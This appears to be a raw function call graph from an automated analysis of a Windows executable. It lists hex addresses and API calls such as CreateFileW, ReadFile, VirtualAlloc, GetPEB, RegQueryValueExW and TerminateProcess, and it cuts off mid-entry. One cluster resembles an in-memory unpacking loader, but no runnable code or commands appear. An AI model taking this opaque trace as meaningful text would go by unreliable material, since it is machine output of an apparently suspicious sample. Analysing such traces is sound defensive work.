98306->98364 98308 de2f58 EncodePointer EncodePointer 98308->98305 98309 de2f07 98309->98308 98310 de2f2c 98309->98310 98365 de8aa4 61 API calls 2 library calls 98309->98365 98310->98305 98314 de2f46 EncodePointer 98310->98314 98366 de8aa4 61 API calls 2 library calls 98310->98366 98313 de2f40 98313->98305 98313->98314 98314->98308 98367 de3460 98315->98367 98319 de9e6f EnterCriticalSection 98318->98319 98320 de9e5c 98318->98320 98319->98303 98325 de9ed3 98320->98325 98322 de9e62 98322->98319 98349 de32f5 58 API calls 3 library calls 98322->98349 98326 de9edf _wprintf 98325->98326 98327 de9ee8 98326->98327 98328 de9f00 98326->98328 98350 dea3ab 58 API calls __NMSG_WRITE 98327->98350 98337 de9f21 _wprintf 98328->98337 98353 de8a5d 58 API calls 2 library calls 98328->98353 98331 de9eed 98351 dea408 58 API calls 4 library calls 98331->98351 98333 de9f15 98335 de9f1c 98333->98335 98336 de9f2b 98333->98336 98334 de9ef4 98352 de32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98334->98352 98354 de8d68 58 API calls __getptd_noexit 98335->98354 98340 de9e4b __lock 58 API calls 98336->98340 98337->98322 98342 de9f32 98340->98342 98343 de9f3f 98342->98343 98344 de9f57 98342->98344 98355 dea06b InitializeCriticalSectionAndSpinCount 98343->98355 98356 de2f95 98344->98356 98347 de9f4b 98362 de9f73 LeaveCriticalSection _doexit 98347->98362 98350->98331 98351->98334 98353->98333 98354->98337 98355->98347 98357 de2f9e RtlFreeHeap 98356->98357 98358 de2fc7 __dosmaperr 98356->98358 98357->98358 98359 de2fb3 98357->98359 98358->98347 98363 de8d68 58 API calls __getptd_noexit 98359->98363 98361 de2fb9 GetLastError 98361->98358 98362->98337 98363->98361 98364->98309 98365->98310 98366->98313 98370 de9fb5 LeaveCriticalSection 98367->98370 98369 de2ec7 98369->98300 98370->98369 98371 158295b 98372 1582962 98371->98372 98373 158296a 98372->98373 98374 1582a00 98372->98374 98378 1582610 98373->98378 98391 15832b0 9 API calls 98374->98391 98377 15829e7 98392 1580000 98378->98392 98380 15826af 98383 1582709 VirtualAlloc 98380->98383 98388 15826ed 98380->98388 98389 1582810 FindCloseChangeNotification 98380->98389 98390 1582820 VirtualFree 98380->98390 98395 1583520 GetPEB 98380->98395 98382 15826e0 CreateFileW 98382->98380 98382->98388 98384 158272a ReadFile 98383->98384 98383->98388 98385 1582748 VirtualAlloc 98384->98385 98384->98388 98385->98380 98385->98388 98386 158290a 98386->98377 98387 15828fc VirtualFree 98387->98386 98388->98386 98388->98387 98389->98380 98390->98380 98391->98377 98397 15834c0 GetPEB 98392->98397 98394 158068b 98394->98380 98396 158354a 98395->98396 98396->98382 98398 15834ea 98397->98398 98398->98394 98399 dc568a 98406 dc5c18 98399->98406 98405 dc56ba Mailbox 98407 de0ff6 Mailbox 59 API calls 98406->98407 98408 dc5c2b 98407->98408 98409 de0ff6 Mailbox 59 API calls 98408->98409 98410 dc569c 98409->98410 98411 dc5632 98410->98411 98425 dc5a2f 98411->98425 98413 dc5674 98413->98405 98417 dc81c1 MultiByteToWideChar 98413->98417 98415 dc5643 98415->98413 98432 dc5d20 98415->98432 98438 dc5bda 59 API calls 2 library calls 98415->98438 98418 dc822e 98417->98418 98419 dc81e7 98417->98419 98421 dc7eec 59 API calls 98418->98421 98420 de0ff6 Mailbox 59 API calls 98419->98420 98422 dc81fc MultiByteToWideChar 98420->98422 98424 dc8220 98421->98424 98441 dc78ad 98422->98441 98424->98405 98426 dfe065 98425->98426 98427 dc5a40 98425->98427 98439 e16443 59 API calls Mailbox 98426->98439 98427->98415 98429 dfe06f 98430 de0ff6 Mailbox 59 API calls 98429->98430 98431 dfe07b 98430->98431 98433 dc5d93 98432->98433 98435 dc5d2e 98432->98435 98440 dc5dae SetFilePointerEx 98433->98440 98434 dc5d56 98434->98415 98435->98434 98437 dc5d66 ReadFile 98435->98437 98437->98434 98437->98435 98438->98415 98439->98429 98440->98435 98442 dc78bc 98441->98442 98443 dc792f 98441->98443 98442->98443 98445 dc78c8 98442->98445 98444 dc7e8c 59 API calls 98443->98444 98452 dc78da _memmove 98444->98452 98446 dc7900 98445->98446 98447 dc78d2 98445->98447 98448 dc8189 59 API calls 98446->98448 98449 dc8087 59 API calls 98447->98449 98450 dc790a 98448->98450 98449->98452 98451 de0ff6 Mailbox 59 API calls 98450->98451 98451->98452 98452->98424 98453 e00226 98459 dcade2 Mailbox 98453->98459 98455 e00c86 98622 e166f4 98455->98622 98457 e00c8f 98459->98455 98459->98457 98460 e000e0 VariantClear 98459->98460 98461 dcb6c1 98459->98461 98470 e3e24b 98459->98470 98473 e3e237 98459->98473 98476 e2d2e6 98459->98476 98523 dc5906 98459->98523 98532 e3474d 98459->98532 98541 e423c9 98459->98541 98579 dd2123 98459->98579 98619 dc9df0 59 API calls Mailbox 98459->98619 98620 e17405 59 API calls 98459->98620 98460->98459 98621 e2a0b5 89 API calls 4 library calls 98461->98621 98625 e3cdf1 98470->98625 98472 e3e25b 98472->98459 98474 e3cdf1 130 API calls 98473->98474 98475 e3e247 98474->98475 98475->98459 98477 e2d310 98476->98477 98478 e2d305 98476->98478 98481 dc77c7 59 API calls 98477->98481 98520 e2d3ea Mailbox 98477->98520 98782 dc9c9c 59 API calls 98478->98782 98480 de0ff6 Mailbox 59 API calls 98482 e2d433 98480->98482 98483 e2d334 98481->98483 98484 e2d43f 98482->98484 98486 dc5906 60 API calls 98482->98486 98485 dc77c7 59 API calls 98483->98485 98487 dc9997 84 API calls 98484->98487 98488 e2d33d 98485->98488 98486->98484 98489 e2d457 98487->98489 98490 dc9997 84 API calls 98488->98490 98769 dc5956 98489->98769 98492 e2d349 98490->98492 98783 dc46f9 98492->98783 98495 e2d46a GetLastError 98498 e2d483 98495->98498 98496 e2d49e 98500 e2d500 98496->98500 98501 e2d4c9 98496->98501 98497 e2d35e 98834 dc7c8e 98497->98834 98521 e2d3f3 Mailbox 98498->98521 98848 dc5a1a CloseHandle 98498->98848 98505 de0ff6 Mailbox 59 API calls 98500->98505 98503 de0ff6 Mailbox 59 API calls 98501->98503 98510 e2d4ce 98503->98510 98504 e2d3e3 98847 dc9c9c 59 API calls 98504->98847 98506 e2d505 98505->98506 98513 dc77c7 59 API calls 98506->98513 98506->98521 98511 e2d4df 98510->98511 98514 dc77c7 59 API calls 98510->98514 98849 e2f835 59 API calls 2 library calls 98511->98849 98513->98521 98514->98511 98515 e2d3a5 98516 dc7f41 59 API calls 98515->98516 98518 e2d3b2 98516->98518 98846 e23c66 63 API calls Mailbox 98518->98846 98520->98480 98520->98521 98521->98459 98522 e2d3bb Mailbox 98522->98504 98524 de0ff6 Mailbox 59 API calls 98523->98524 98525 dc5916 98524->98525 98526 dc5dcf CloseHandle 98525->98526 98527 dc5921 98526->98527 98528 dc77c7 59 API calls 98527->98528 98529 dc5929 98528->98529 98530 dc5dcf CloseHandle 98529->98530 98531 dc5930 98530->98531 98531->98459 98533 dc9997 84 API calls 98532->98533 98534 e34787 98533->98534 98919 dc63a0 98534->98919 98536 e34797 98537 e347bc 98536->98537 98944 dca000 98536->98944 98540 e347c0 98537->98540 98967 dc9bf8 98537->98967 98540->98459 98542 dc77c7 59 API calls 98541->98542 98543 e423e0 98542->98543 98544 dc9997 84 API calls 98543->98544 98545 e423ef 98544->98545 98546 dc7b76 59 API calls 98545->98546 98547 e42402 98546->98547 98548 dc9997 84 API calls 98547->98548 98549 e4240f 98548->98549 98550 e4249d 98549->98550 98551 e42429 98549->98551 98552 dc9997 84 API calls 98550->98552 99024 dc9c9c 59 API calls 98551->99024 98554 e424a2 98552->98554 98556 e424b0 98554->98556 98557 e424ce 98554->98557 98555 e4242e 98558 e4248c 98555->98558 98562 e42445 98555->98562 98561 dc9bf8 59 API calls 98556->98561 98559 e424e3 98557->98559 99025 dc9c9c 59 API calls 98557->99025 98560 dc9bf8 59 API calls 98558->98560 98565 e424f8 98559->98565 99026 dc9c9c 59 API calls 98559->99026 98572 e42499 Mailbox 98560->98572 98561->98572 98563 dc79ab 59 API calls 98562->98563 98566 e42452 98563->98566 98568 dc80d7 59 API calls 98565->98568 98570 dc7c8e 59 API calls 98566->98570 98569 e42512 98568->98569 99005 e1f8f2 98569->99005 98573 e42460 98570->98573 98572->98459 98575 dc79ab 59 API calls 98573->98575 98574 e42487 99027 dc9b9c 59 API calls Mailbox 98574->99027 98576 e42479 98575->98576 98577 dc7c8e 59 API calls 98576->98577 98577->98574 98580 dc9bf8 59 API calls 98579->98580 98581 dd213b 98580->98581 98583 de0ff6 Mailbox 59 API calls 98581->98583 98586 e069af 98581->98586 98584 dd2154 98583->98584 98587 dd2164 98584->98587 98588 dc5906 60 API calls 98584->98588 98585 dd2189 98594 dd2196 98585->98594 99047 dc9c9c 59 API calls 98585->99047 98586->98585 99046 e2f7df 59 API calls 98586->99046 98589 dc9997 84 API calls 98587->98589 98588->98587 98591 dd2172 98589->98591 98593 dc5956 67 API calls 98591->98593 98592 e069f7 98592->98594 98595 e069ff 98592->98595 98596 dd2181 98593->98596 98597 dc5e3f 2 API calls 98594->98597 99048 dc9c9c 59 API calls 98595->99048 98596->98585 98596->98586 99045 dc5a1a CloseHandle 98596->99045 98600 dd219d 98597->98600 98601 e06a11 98600->98601 98602 dd21b7 98600->98602 98604 de0ff6 Mailbox 59 API calls 98601->98604 98603 dc77c7 59 API calls 98602->98603 98605 dd21bf 98603->98605 98606 e06a17 98604->98606 99028 dc56d2 98605->99028 98608 e06a2b 98606->98608 99049 dc59b0 ReadFile SetFilePointerEx 98606->99049 98613 e06a2f _memmove 98608->98613 99050 e2794e 59 API calls 2 library calls 98608->99050 98610 dd21ce 98610->98613 99043 dc9b9c 59 API calls Mailbox 98610->99043 98614 dd21e2 Mailbox 98615 dd221c 98614->98615 98616 dc5dcf CloseHandle 98614->98616 98615->98459 98617 dd2210 98616->98617 98617->98615 99044 dc5a1a CloseHandle 98617->99044 98619->98459 98620->98459 98621->98455 99054 e16636 98622->99054 98624 e16702 98624->98457 98663 dc9997 98625->98663 98628 e3ce75 Mailbox 98628->98472 98630 e3d242 98731 e3dbdc 92 API calls Mailbox 98630->98731 98631 e3d0db 98694 e3cc82 98631->98694 98634 e3d251 98634->98631 98636 e3d25d 98634->98636 98635 dc9997 84 API calls 98651 e3cec6 Mailbox 98635->98651 98636->98628 98641 e3d114 98709 de0e48 98641->98709 98644 e3d147 98716 dc942e 98644->98716 98645 e3d12e 98715 e2a0b5 89 API calls 4 library calls 98645->98715 98648 e3d0cd 98648->98630 98648->98631 98650 e3d139 GetCurrentProcess TerminateProcess 98650->98644 98651->98628 98651->98635 98651->98648 98713 e2f835 59 API calls 2 library calls 98651->98713 98714 e3d2f3 61 API calls 2 library calls 98651->98714 98655 e3d2b8 98655->98628 98659 e3d2cc FreeLibrary 98655->98659 98656 e3d17f 98728 e3d95d 107 API calls _free 98656->98728 98659->98628 98661 e3d190 98661->98655 98729 dc8ea0 59 API calls Mailbox 98661->98729 98730 dc9e9c 60 API calls Mailbox 98661->98730 98732 e3d95d 107 API calls _free 98661->98732 98664 dc99ab 98663->98664 98665 dc99b1 98663->98665 98664->98628 98681 e3dab9 98664->98681 98666 dff9fc __i64tow 98665->98666 98667 dc99f9 98665->98667 98669 dc99b7 __itow 98665->98669 98672 dff903 98665->98672 98733 de38d8 83 API calls 3 library calls 98667->98733 98671 de0ff6 Mailbox 59 API calls 98669->98671 98673 dc99d1 98671->98673 98675 de0ff6 Mailbox 59 API calls 98672->98675 98679 dff97b Mailbox _wcscpy 98672->98679 98673->98664 98674 dc7f41 59 API calls 98673->98674 98674->98664 98676 dff948 98675->98676 98677 de0ff6 Mailbox 59 API calls 98676->98677 98678 dff96e 98677->98678 98678->98679 98680 dc7f41 59 API calls 98678->98680 98734 de38d8 83 API calls 3 library calls 98679->98734 98680->98679 98682 dc7faf 59 API calls 98681->98682 98683 e3dad4 CharLowerBuffW 98682->98683 98735 e1f658 98683->98735 98687 dc77c7 59 API calls 98688 e3db0d 98687->98688 98742 dc79ab 98688->98742 98690 e3db6c Mailbox 98690->98651 98691 e3db24 98692 dc7e8c 59 API calls 98691->98692 98693 e3db30 Mailbox 98692->98693 98693->98690 98755 e3d2f3 61 API calls 2 library calls 98693->98755 98695 e3cc9d 98694->98695 98699 e3ccf2 98694->98699 98696 de0ff6 Mailbox 59 API calls 98695->98696 98698 e3ccbf 98696->98698 98697 de0ff6 Mailbox 59 API calls 98697->98698 98698->98697 98698->98699 98700 e3dd64 98699->98700 98701 e3df8d Mailbox 98700->98701 98708 e3dd87 _strcat _wcscpy __NMSG_WRITE 98700->98708 98701->98641 98702 dc9cf8 59 API calls 98702->98708 98703 dc9d46 59 API calls 98703->98708 98704 dc9c9c 59 API calls 98704->98708 98705 dc9997 84 API calls 98705->98708 98706 de594c 58 API calls __malloc_crt 98706->98708 98708->98701 98708->98702 98708->98703 98708->98704 98708->98705 98708->98706 98758 e25b29 61 API calls 2 library calls 98708->98758 98710 de0e5d 98709->98710 98711 de0ef5 VirtualAlloc 98710->98711 98712 de0ec3 98710->98712 98711->98712 98712->98644 98712->98645 98713->98651 98714->98651 98715->98650 98717 dc9436 98716->98717 98718 de0ff6 Mailbox 59 API calls 98717->98718 98719 dc9444 98718->98719 98720 dc9450 98719->98720 98759 dc935c 59 API calls Mailbox 98719->98759 98722 dc91b0 98720->98722 98760 dc92c0 98722->98760 98724 dc91bf 98725 de0ff6 Mailbox 59 API calls 98724->98725 98726 dc925b 98724->98726 98725->98726 98726->98661 98727 dc8ea0 59 API calls Mailbox 98726->98727 98727->98656 98728->98661 98729->98661 98730->98661 98731->98634 98732->98661 98733->98669 98734->98666 98736 e1f683 __NMSG_WRITE 98735->98736 98737 e1f6c2 98736->98737 98740 e1f6b8 98736->98740 98741 e1f769 98736->98741 98737->98687 98737->98693 98740->98737 98756 dc7a24 61 API calls 98740->98756 98741->98737 98757 dc7a24 61 API calls 98741->98757 98743 dc79ba 98742->98743 98744 dc7a17 98742->98744 98743->98744 98746 dc79c5 98743->98746 98745 dc7e8c 59 API calls 98744->98745 98752 dc79e8 _memmove 98745->98752 98747 dc79e0 98746->98747 98748 dfef32 98746->98748 98750 dc8087 59 API calls 98747->98750 98749 dc8189 59 API calls 98748->98749 98751 dfef3c 98749->98751 98750->98752 98753 de0ff6 Mailbox 59 API calls 98751->98753 98752->98691 98754 dfef5c 98753->98754 98755->98690 98756->98740 98757->98741 98758->98708 98759->98720 98761 dc92c9 Mailbox 98760->98761 98762 dff5c8 98761->98762 98767 dc92d3 98761->98767 98763 de0ff6 Mailbox 59 API calls 98762->98763 98764 dff5d4 98763->98764 98765 dc92da 98765->98724 98767->98765 98768 dc9df0 59 API calls Mailbox 98767->98768 98768->98767 98850 dc5dcf 98769->98850 98773 dc5981 98774 dc59a4 98773->98774 98862 dc5770 98773->98862 98774->98495 98774->98496 98776 dc5993 98879 dc53db SetFilePointerEx SetFilePointerEx 98776->98879 98778 dfe030 98880 e23696 SetFilePointerEx SetFilePointerEx WriteFile 98778->98880 98779 dc599a 98779->98774 98779->98778 98781 dfe060 98781->98774 98782->98477 98784 dc77c7 59 API calls 98783->98784 98785 dc470f 98784->98785 98786 dc77c7 59 API calls 98785->98786 98787 dc4717 98786->98787 98788 dc77c7 59 API calls 98787->98788 98789 dc471f 98788->98789 98790 dc77c7 59 API calls 98789->98790 98791 dc4727 98790->98791 98792 dfd8fb 98791->98792 98793 dc475b 98791->98793 98794 dc81a7 59 API calls 98792->98794 98795 dc79ab 59 API calls 98793->98795 98796 dfd904 98794->98796 98797 dc4769 98795->98797 98798 dc7eec 59 API calls 98796->98798 98799 dc7e8c 59 API calls 98797->98799 98801 dc479e 98798->98801 98800 dc4773 98799->98800 98800->98801 98802 dc79ab 59 API calls 98800->98802 98803 dc47de 98801->98803 98805 dc47bd 98801->98805 98816 dfd924 98801->98816 98806 dc4794 98802->98806 98804 dc79ab 59 API calls 98803->98804 98808 dc47ef 98804->98808 98896 dc7b52 98805->98896 98810 dc7e8c 59 API calls 98806->98810 98812 dc4801 98808->98812 98899 dc81a7 98808->98899 98809 dfd9f4 98813 dc7d2c 59 API calls 98809->98813 98810->98801 98815 dc4811 98812->98815 98820 dc81a7 59 API calls 98812->98820 98829 dfd9b1 98813->98829 98818 dc4818 98815->98818 98821 dc81a7 59 API calls 98815->98821 98816->98809 98817 dfd9dd 98816->98817 98831 dfd95b 98816->98831 98817->98809 98826 dfd9c8 98817->98826 98822 dc81a7 59 API calls 98818->98822 98823 dc481f Mailbox 98818->98823 98819 dc79ab 59 API calls 98819->98803 98820->98815 98821->98818 98822->98823 98823->98497 98824 dc7b52 59 API calls 98824->98829 98825 dfd9b9 98827 dc7d2c 59 API calls 98825->98827 98828 dc7d2c 59 API calls 98826->98828 98827->98829 98828->98829 98829->98803 98829->98824 98903 dc7a84 59 API calls 2 library calls 98829->98903 98831->98825 98832 dfd9a4 98831->98832 98833 dc7d2c 59 API calls 98832->98833 98833->98829 98835 dff094 98834->98835 98836 dc7ca0 98834->98836 98914 e18123 59 API calls _memmove 98835->98914 98908 dc7bb1 98836->98908 98839 dc7cac 98839->98504 98843 e23e73 98839->98843 98840 dff09e 98841 dc81a7 59 API calls 98840->98841 98842 dff0a6 Mailbox 98841->98842 98915 e24696 GetFileAttributesW 98843->98915 98846->98522 98847->98520 98848->98521 98849->98521 98851 dc5de8 98850->98851 98852 dc5962 98850->98852 98851->98852 98853 dc5ded CloseHandle 98851->98853 98854 dc5df9 98852->98854 98853->98852 98855 dfe181 98854->98855 98856 dc5e12 CreateFileW 98854->98856 98857 dc5e34 98855->98857 98858 dfe187 CreateFileW 98855->98858 98856->98857 98857->98773 98858->98857 98859 dfe1ad 98858->98859 98881 dc5c4e 98859->98881 98863 dfdfce 98862->98863 98864 dc578b 98862->98864 98873 dc581a 98863->98873 98891 dc5e3f 98863->98891 98865 dc5c4e 2 API calls 98864->98865 98864->98873 98866 dc57ad 98865->98866 98867 dc538e 59 API calls 98866->98867 98869 dc57b7 98867->98869 98869->98863 98870 dc57c4 98869->98870 98871 de0ff6 Mailbox 59 API calls 98870->98871 98872 dc57cf 98871->98872 98874 dc538e 59 API calls 98872->98874 98873->98776 98875 dc57da 98874->98875 98876 dc5d20 2 API calls 98875->98876 98877 dc5807 98876->98877 98878 dc5c4e 2 API calls 98877->98878 98878->98873 98879->98779 98880->98781 98882 dc5c68 98881->98882 98883 dc5cef SetFilePointerEx 98882->98883 98884 dfe151 98882->98884 98888 dc5cc3 98882->98888 98889 dc5dae SetFilePointerEx 98883->98889 98890 dc5dae SetFilePointerEx 98884->98890 98887 dfe16b 98888->98857 98889->98888 98890->98887 98892 dc5c4e 2 API calls 98891->98892 98893 dc5e60 98892->98893 98894 dc5c4e 2 API calls 98893->98894 98895 dc5e74 98894->98895 98895->98873 98897 dc7faf 59 API calls 98896->98897 98898 dc47c7 98897->98898 98898->98803 98898->98819 98900 dc81ba 98899->98900 98901 dc81b2 98899->98901 98900->98812 98904 dc80d7 98901->98904 98903->98829 98906 dc80e7 98904->98906 98907 dc80fa _memmove 98904->98907 98905 de0ff6 Mailbox 59 API calls 98905->98907 98906->98905 98906->98907 98907->98900 98909 dc7bbf 98908->98909 98913 dc7be5 _memmove 98908->98913 98910 de0ff6 Mailbox 59 API calls 98909->98910 98909->98913 98911 dc7c34 98910->98911 98912 de0ff6 Mailbox 59 API calls 98911->98912 98912->98913 98913->98839 98914->98840 98916 e23e7a 98915->98916 98917 e246b1 FindFirstFileW 98915->98917 98916->98504 98916->98515 98917->98916 98918 e246c6 FindClose 98917->98918 98918->98916 98980 dc7b76 98919->98980 98921 dc65ca 98987 dc766f 98921->98987 98923 dc65e4 Mailbox 98923->98536 98926 dfe41f 98997 e1fdba 91 API calls 4 library calls 98926->98997 98927 dc7eec 59 API calls 98939 dc63c5 98927->98939 98928 dc766f 59 API calls 98928->98939 98932 dfe42d 98933 dc766f 59 API calls 98932->98933 98934 dfe443 98933->98934 98934->98923 98935 dc68f9 _memmove 98998 e1fdba 91 API calls 4 library calls 98935->98998 98936 dfe3bb 98937 dc8189 59 API calls 98936->98937 98938 dfe3c6 98937->98938 98943 de0ff6 Mailbox 59 API calls 98938->98943 98939->98921 98939->98926 98939->98927 98939->98928 98939->98935 98939->98936 98941 dc7faf 59 API calls 98939->98941 98985 dc60cc 60 API calls 98939->98985 98986 dc5ea1 59 API calls Mailbox 98939->98986 98995 dc5fd2 60 API calls 98939->98995 98996 dc7a84 59 API calls 2 library calls 98939->98996 98942 dc659b CharUpperBuffW 98941->98942 98942->98939 98943->98935 98945 dca01f 98944->98945 98959 dca04d Mailbox 98944->98959 98946 de0ff6 Mailbox 59 API calls 98945->98946 98946->98959 98947 dcb5d5 98948 dc81a7 59 API calls 98947->98948 98962 dca1b7 98948->98962 98949 e17405 59 API calls 98949->98959 98950 de0ff6 59 API calls Mailbox 98950->98959 98953 e0047f 99001 e2a0b5 89 API calls 4 library calls 98953->99001 98955 dc77c7 59 API calls 98955->98959 98957 dc81a7 59 API calls 98957->98959 98959->98947 98959->98949 98959->98950 98959->98953 98959->98955 98959->98957 98961 de2f80 67 API calls __cinit 98959->98961 98959->98962 98963 e00e00 98959->98963 98965 dca6ba 98959->98965 98966 dcb5da 98959->98966 98999 dcca20 331 API calls 2 library calls 98959->98999 99000 dcba60 60 API calls Mailbox 98959->99000 98960 e0048e 98960->98537 98961->98959 98962->98537 99003 e2a0b5 89 API calls 4 library calls 98963->99003 99002 e2a0b5 89 API calls 4 library calls 98965->99002 99004 e2a0b5 89 API calls 4 library calls 98966->99004 98968 dffbff 98967->98968 98969 dc9c08 98967->98969 98970 dffc10 98968->98970 98972 dc7d2c 59 API calls 98968->98972 98974 de0ff6 Mailbox 59 API calls 98969->98974 98971 dc7eec 59 API calls 98970->98971 98973 dffc1a 98971->98973 98972->98970 98977 dc9c34 98973->98977 98978 dc77c7 59 API calls 98973->98978 98975 dc9c1b 98974->98975 98975->98973 98976 dc9c26 98975->98976 98976->98977 98979 dc7f41 59 API calls 98976->98979 98977->98540 98978->98977 98979->98977 98981 de0ff6 Mailbox 59 API calls 98980->98981 98982 dc7b9b 98981->98982 98983 dc8189 59 API calls 98982->98983 98984 dc7baa 98983->98984 98984->98939 98985->98939 98986->98939 98988 dc770f 98987->98988 98991 dc7682 _memmove 98987->98991 98990 de0ff6 Mailbox 59 API calls 98988->98990 98989 de0ff6 Mailbox 59 API calls 98992 dc7689 98989->98992 98990->98991 98991->98989 98993 de0ff6 Mailbox 59 API calls 98992->98993 98994 dc76b2 98992->98994 98993->98994 98994->98923 98995->98939 98996->98939 98997->98932 98998->98923 98999->98959 99000->98959 99001->98960 99002->98962 99003->98966 99004->98962 99006 dc77c7 59 API calls 99005->99006 99007 e1f905 99006->99007 99008 dc7b76 59 API calls 99007->99008 99009 e1f919 99008->99009 99010 e1f658 61 API calls 99009->99010 99020 e1f93b 99009->99020 99012 e1f935 99010->99012 99011 e1f658 61 API calls 99011->99020 99013 dc79ab 59 API calls 99012->99013 99012->99020 99013->99020 99014 e1f9b5 99016 dc79ab 59 API calls 99014->99016 99015 dc79ab 59 API calls 99015->99020 99017 e1f9ce 99016->99017 99019 dc7c8e 59 API calls 99017->99019 99018 dc7c8e 59 API calls 99018->99020 99021 e1f9da 99019->99021 99020->99011 99020->99014 99020->99015 99020->99018 99022 dc80d7 59 API calls 99021->99022 99023 e1f9e9 Mailbox 99021->99023 99022->99023 99023->98574 99024->98555 99025->98559 99026->98565 99027->98572 99029 dc56dd 99028->99029 99030 dc5702 99028->99030 99029->99030 99034 dc56ec 99029->99034 99031 dc7eec 59 API calls 99030->99031 99035 e2349a 99031->99035 99032 e234c9 99032->98610 99036 dc5c18 59 API calls 99034->99036 99035->99032 99051 e23436 ReadFile SetFilePointerEx 99035->99051 99052 dc7a84 59 API calls 2 library calls 99035->99052 99038 e235ba 99036->99038 99039 dc5632 61 API calls 99038->99039 99040 e235c8 99039->99040 99042 e235d8 Mailbox 99040->99042 99053 dc793a 61 API calls Mailbox 99040->99053 99042->98610 99043->98614 99044->98615 99045->98586 99046->98586 99047->98592 99048->98600 99049->98608 99050->98613 99051->99035 99052->99035 99053->99042 99055 e16641 99054->99055 99056 e1665e 99054->99056 99055->99056 99058 e16621 59 API calls Mailbox 99055->99058 99056->98624 99058->99055 99059 dce70b 99062 dcd260 99059->99062 99061 dce719 99063 dcd27d 99062->99063 99091 dcd4dd 99062->99091 99064 e02b0a 99063->99064 99065 e02abb 99063->99065 99094 dcd2a4 99063->99094 99110 e3a6fb 331 API calls __cinit 99064->99110 99068 e02abe 99065->99068 99073 e02ad9 99065->99073 99069 e02aca 99068->99069 99068->99094 99108 e3ad0f 331 API calls 99069->99108 99070 de2f80 __cinit 67 API calls 99070->99094 99073->99091 99109 e3b1b7 331 API calls 3 library calls 99073->99109 99074 dcd594 99102 dc8bb2 68 API calls 99074->99102 99075 e02cdf 99075->99075 99076 dcd6ab 99076->99061 99080 dcd5a3 99080->99061 99081 e02c26 99114 e3aa66 89 API calls 99081->99114 99091->99076 99115 e2a0b5 89 API calls 4 library calls 99091->99115 99092 dca000 331 API calls 99092->99094 99093 dc81a7 59 API calls 99093->99094 99094->99070 99094->99074 99094->99076 99094->99081 99094->99091 99094->99092 99094->99093 99096 dc88a0 68 API calls __cinit 99094->99096 99097 dc86a2 68 API calls 99094->99097 99098 dc8620 99094->99098 99103 dc859a 68 API calls 99094->99103 99104 dcd0dc 331 API calls 99094->99104 99105 dc9f3a 59 API calls Mailbox 99094->99105 99106 dcd060 89 API calls 99094->99106 99107 dccedd 331 API calls 99094->99107 99111 dc8bb2 68 API calls 99094->99111 99112 dc9e9c 60 API calls Mailbox 99094->99112 99113 e16d03 60 API calls 99094->99113 99096->99094 99097->99094 99099 dc862b 99098->99099 99101 dc8652 99099->99101 99116 dc8b13 69 API calls Mailbox 99099->99116 99101->99094 99102->99080 99103->99094 99104->99094 99105->99094 99106->99094 99107->99094 99108->99076 99109->99091 99110->99094 99111->99094 99112->99094 99113->99094 99114->99091 99115->99075 99116->99101 99117 15823b0 99118 1580000 GetPEB 99117->99118 99119 1582491 99118->99119 99131 15822a0 99119->99131 99132 15822a9 Sleep 99131->99132 99133 15822b7 99132->99133 99134 dc1055 99139 dc2649 99134->99139 99137 de2f80 __cinit 67 API calls 99138 dc1064 99137->99138 99140 dc77c7 59 API calls 99139->99140 99141 dc26b7 99140->99141 99146 dc3582 99141->99146 99143 dc2754 99144 dc105a 99143->99144 99149 dc3416 59 API calls 2 library calls 99143->99149 99144->99137 99150 dc35b0 99146->99150 99149->99143 99151 dc35bd 99150->99151 99152 dc35a1 99150->99152 99151->99152 99153 dc35c4 RegOpenKeyExW 99151->99153 99152->99143 99153->99152 99154 dc35de RegQueryValueExW 99153->99154 99155 dc35ff 99154->99155 99156 dc3614 RegCloseKey 99154->99156 99155->99156 99156->99152 99157 dfff06 99158 dfff10 99157->99158 99194 dcac90 Mailbox _memmove 99157->99194 99299 dc8e34 59 API calls Mailbox 99158->99299 99164 dcb5d5 99167 dc81a7 59 API calls 99164->99167 99165 de0ff6 59 API calls Mailbox 99183 dca097 Mailbox 99165->99183 99177 dca1b7 99167->99177 99168 e0047f 99303 e2a0b5 89 API calls 4 library calls 99168->99303 99169 dcb5da 99309 e2a0b5 89 API calls 4 library calls 99169->99309 99171 dc81a7 59 API calls 99171->99183 99173 dc77c7 59 API calls 99173->99183 99174 dc7f41 59 API calls 99174->99194 99176 e0048e 99178 de2f80 67 API calls __cinit 99178->99183 99180 e17405 59 API calls 99180->99183 99181 e166f4 Mailbox 59 API calls 99181->99177 99182 e00e00 99308 e2a0b5 89 API calls 4 library calls 99182->99308 99183->99164 99183->99165 99183->99168 99183->99169 99183->99171 99183->99173 99183->99177 99183->99178 99183->99180 99183->99182 99186 dca6ba 99183->99186 99293 dcca20 331 API calls 2 library calls 99183->99293 99294 dcba60 60 API calls Mailbox 99183->99294 99307 e2a0b5 89 API calls 4 library calls 99186->99307 99187 e166f4 Mailbox 59 API calls 99187->99194 99188 dcb416 99298 dcf803 331 API calls 99188->99298 99190 dca000 331 API calls 99190->99194 99191 e00c94 99305 dc9df0 59 API calls Mailbox 99191->99305 99193 e00ca2 99306 e2a0b5 89 API calls 4 library calls 99193->99306 99194->99174 99194->99177 99194->99183 99194->99187 99194->99188 99194->99190 99194->99191 99194->99193 99197 dcb37c 99194->99197 99199 de0ff6 59 API calls Mailbox 99194->99199 99203 dcb685 99194->99203 99206 dcade2 Mailbox 99194->99206 99215 e3c5f4 99194->99215 99247 e27be0 99194->99247 99253 e3bf80 99194->99253 99300 e17405 59 API calls 99194->99300 99301 e3c4a7 85 API calls 2 library calls 99194->99301 99196 e00c86 99196->99177 99196->99181 99296 dc9e9c 60 API calls Mailbox 99197->99296 99199->99194 99200 dcb38d 99297 dc9e9c 60 API calls Mailbox 99200->99297 99304 e2a0b5 89 API calls 4 library calls 99203->99304 99206->99177 99206->99196 99206->99203 99207 e000e0 VariantClear 99206->99207 99208 e2d2e6 101 API calls 99206->99208 99209 e3e237 130 API calls 99206->99209 99210 e3e24b 130 API calls 99206->99210 99211 dc5906 60 API calls 99206->99211 99212 e423c9 87 API calls 99206->99212 99213 dd2123 95 API calls 99206->99213 99214 e3474d 331 API calls 99206->99214 99295 dc9df0 59 API calls Mailbox 99206->99295 99302 e17405 59 API calls 99206->99302 99207->99206 99208->99206 99209->99206 99210->99206 99211->99206 99212->99206 99213->99206 99214->99206 99216 dc77c7 59 API calls 99215->99216 99217 e3c608 99216->99217 99218 dc77c7 59 API calls 99217->99218 99219 e3c610 99218->99219 99220 dc77c7 59 API calls 99219->99220 99221 